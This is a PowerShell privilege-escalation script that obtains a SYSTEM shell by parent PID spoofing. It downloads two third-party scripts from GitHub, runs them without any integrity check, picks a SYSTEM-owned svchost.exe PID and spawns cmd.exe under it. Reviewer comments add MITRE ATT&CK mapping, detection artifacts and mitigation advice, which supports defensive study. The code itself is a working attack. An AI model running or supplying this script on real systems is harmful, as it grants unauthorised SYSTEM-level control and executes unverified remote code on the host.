# SeDebugPrivilege Exploit Script
# Automatically obtains a SYSTEM shell via parent process spoofing.
#
# What the script does, in order: downloads two third-party PowerShell
# scripts to C:\Temp, imports one, picks the highest-numbered svchost.exe
# PID owned by SYSTEM, passes that PID to ImpersonateFromParentPid to start
# cmd.exe, then dot-sources the second script.
#
# Reviewer notes (detection / mitigation):
#   - The technique corresponds to MITRE ATT&CK T1134.004 (Parent PID
#     Spoofing). It depends on the calling account holding SeDebugPrivilege,
#     so keep the "Debug programs" user right limited to accounts that need it.
#   - Observable artifacts of this script as written: outbound requests to
#     raw.githubusercontent.com, two .ps1 files created under C:\Temp,
#     WMI queries against Win32_Process, and a new cmd.exe process.
#     PowerShell script block logging (Event ID 4104) records the script
#     text when enabled.

# Step 1: Downloads
# Both URLs point at the `master` branch, a mutable ref, and no hash or
# signature check follows. Whatever those branches contain at download time
# is what steps 2 and 5 execute.
Write-Host "[*] Downloading tools..." -ForegroundColor Cyan
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1" -OutFile C:\Temp\psgetsys.ps1
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1" -OutFile C:\Temp\EnableAllTokenPrivs.ps1

# Step 2: Load
# ImpersonateFromParentPid (used in step 4) is not defined in this file;
# presumably it comes from psgetsys.ps1. Verify against that script.
Write-Host "[*] Loading modules..." -ForegroundColor Cyan
Import-Module C:\Temp\psgetsys.ps1

# Step 3: Find the highest PID among svchost.exe processes owned by SYSTEM
# The pipeline lists every svchost.exe via WMI, re-queries each one by
# ProcessId to call GetOwner(), keeps those whose User is "SYSTEM", sorts by
# ProcessId descending and returns the first ProcessId.
# NOTE(review): the result is not checked. If no process matches,
# $highestPID is empty when it reaches step 4.
Write-Host "[*] Finding highest SYSTEM svchost.exe PID..." -ForegroundColor Cyan
$highestPID = Get-WmiObject Win32_Process -Filter "Name='svchost.exe'" |
    Where-Object { (Get-WmiObject Win32_Process -Filter "ProcessId=$($_.ProcessId)").GetOwner().User -eq "SYSTEM" } |
    Sort-Object ProcessId -Descending |
    Select-Object -First 1 -ExpandProperty ProcessId
Write-Host "[+] Found SYSTEM svchost.exe PID: $highestPID" -ForegroundColor Green

# Step 4: Spawn the SYSTEM shell
# Passes the selected PID as -ppid and cmd.exe as -command.
# Detection: with parent PID spoofing, the parent recorded in
# process-creation telemetry (Security 4688, Sysmon Event ID 1) is the
# spoofed process, not the PowerShell session that made the call. A cmd.exe
# child of svchost.exe on an interactive desktop is worth alerting on.
Write-Host "[*] Spawning SYSTEM shell..." -ForegroundColor Cyan
ImpersonateFromParentPid -ppid $highestPID -command "C:\Windows\system32\cmd.exe"

# Step 5: Load and run EnableAllTokenPrivs
# Dot-sourcing runs the downloaded file in the current session scope.
# Its contents are not visible here; going by the name and the status
# message, it presumably enables the privileges on the current token.
Write-Host "[*] Enabling all token privileges..." -ForegroundColor Cyan
. C:\Temp\EnableAllTokenPrivs.ps1
Write-Host "[+] Done! Check for new cmd.exe window." -ForegroundColor Green